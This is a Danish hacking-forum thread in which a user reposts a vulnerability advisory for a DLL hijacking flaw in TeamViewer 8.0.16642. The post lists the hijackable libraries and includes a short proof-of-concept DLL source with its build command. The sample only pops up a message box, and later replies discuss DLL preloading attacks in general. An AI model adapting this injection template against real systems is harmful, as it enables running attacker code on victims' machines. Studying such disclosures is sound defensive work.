Shellsec / Hacking / Reverse Engineering / Vejledninger / TeamViwer V8.0.16642 Insecure Library Load

Tråd bedømmelse:
  • 1 Stemmer - 5 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Visning af Tråd
TeamViwer V8.0.16642 Insecure Library Load
24-02-2013, 22:36 (Denne besked var sidst ændret: 24-02-2013, 22:50 af Morph3s.)
#1
VIPCronick er Offline
ด็็้้้้้็็็็็้้้้้็็็็็้้้้้༼◉Д◉༽ด็็็็็้้้้้็็็็้้้้้็็็็็้้
****
 		Indlæg: 1.495
Registreret: Feb 2013
Omdømme: 80
TeamViwer V8.0.16642 Insecure Library Load
Ville lige dele denne exploit herinde, da det jo kunne være nogen som ville lege lidt med den. :P


1. RÅDGIVENDE INFORMATION
-----------------------
Produkt: TeamViwer V8.0.16642 Insecure Library Load
Vendor URL: http://www.teamviewer.com/fr/index.aspx
Dato fundet: 2013/02/24
Offentliggjort den: 2013/02/24
  
2. CREDITS
----------
Denne sårbarhed blev opdaget og undersøgt af The Black Devils
# Youtube: www.youtube.com/user/Th3BlackDevils
# Facebook: www.facebook.com / DevilsDz
# Email: mr.k4rizma @ gmail.com
  
3. VERSIONER PÅVIRKET
--------------------
TeamViwer V8.0.16642, kan ældre versioner blive påvirket også.
  
  
4. SÅRBARHED BESKRIVELSE
----------------------------
En Insecure Library Load sårbarhed er blevet identificeret i
TeamViwer V8.0.16642.
  
Programmet bruger en fast sti for at lede efter bestemte filer eller
biblioteker. Denne sti indeholder mapper, der ikke kræver speciel tillid
eller under brugerkontrol.
  
Ved at placere en custom version af et bibliotek i program stien,
Programmet vil indlæse den før den legitime version. Dette giver en
hacker tilladelse til at inject brugerdefineret kode, der vil blive kørt med det
privilegium programmet eller brugeren kørslen af ​​programmet.
Følgende biblioteker kan blive kapret på denne måde:

LPK.dll
SETUPAPI.dll
SHFOLDER.dll
CLBCATQ.DLL
Secur32.dll


5. PROOF-OF-CONCEPT (Kode / Exploit)
------------------------------------
// wine gcc -Wall -shared inject.c -o SETUPAPI.dll

#include <windows.h>

  

BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)

{

    if (dwReason == DLL_PROCESS_ATTACH)

    {

        MessageBox(0,"Inj3ctor","The Black Devils", 0);

    }

return TRUE;

}
[Billede: rGvl8UM.png]
Find alle beskeder fra denne bruger
Citer denne besked i et svar
24-02-2013, 22:39
#2
VIPMorph3s er Offline
VIP bruger
****
 		Indlæg: 506
Registreret: Feb 2013
Omdømme: 24
RE: TeamViwer V8.0.16642 Insecure Library Load
Danish :)
Find alle beskeder fra denne bruger
Citer denne besked i et svar
24-02-2013, 22:45
#3
VIPCronick er Offline
ด็็้้้้้็็็็็้้้้้็็็็็้้้้้༼◉Д◉༽ด็็็็็้้้้้็็็็้้้้้็็็็็้้
****
 		Indlæg: 1.495
Registreret: Feb 2013
Omdømme: 80
RE: TeamViwer V8.0.16642 Insecure Library Load
Sorry morph :D, Skulle være nogenlunde dansk nu :P
[Billede: rGvl8UM.png]
Find alle beskeder fra denne bruger
Citer denne besked i et svar
23-03-2013, 01:57
#4
Spagnum er Offline
Arrangør
*****
 		Indlæg: 678
Registreret: Mar 2013
Omdømme: 24
RE: TeamViwer V8.0.16642 Insecure Library Load
Interesseret... Det gav mig lige en ide til noget jeg skal afprøve....
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
23-03-2013, 17:21
#5
VIPCronick er Offline
ด็็้้้้้็็็็็้้้้้็็็็็้้้้้༼◉Д◉༽ด็็็็็้้้้้็็็็้้้้้็็็็็้้
****
 		Indlæg: 1.495
Registreret: Feb 2013
Omdømme: 80
RE: TeamViwer V8.0.16642 Insecure Library Load
Godt du kunne bruge den spagnum :D
[Billede: rGvl8UM.png]
Find alle beskeder fra denne bruger
Citer denne besked i et svar
08-09-2015, 23:44
#6
MalcolmXI er Offline
Aktivt Medlem
***
 		Indlæg: 837
Registreret: May 2013
Omdømme: 32
RE: TeamViwer V8.0.16642 Insecure Library Load
Ved godt denne tråd er en ældre en af slagsen, men DLL hijacking/preloading angreb lever stadig i bedste velgående.
Selv Acunetix har været sårbar(er højst sandsynligt patched). Og det er skam ikke udelukkende Windows der har problemet.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)
Kontakt os | Shellsec | Vend tilbage til toppen | Let (arkiv) udseende | RSS synkronisering |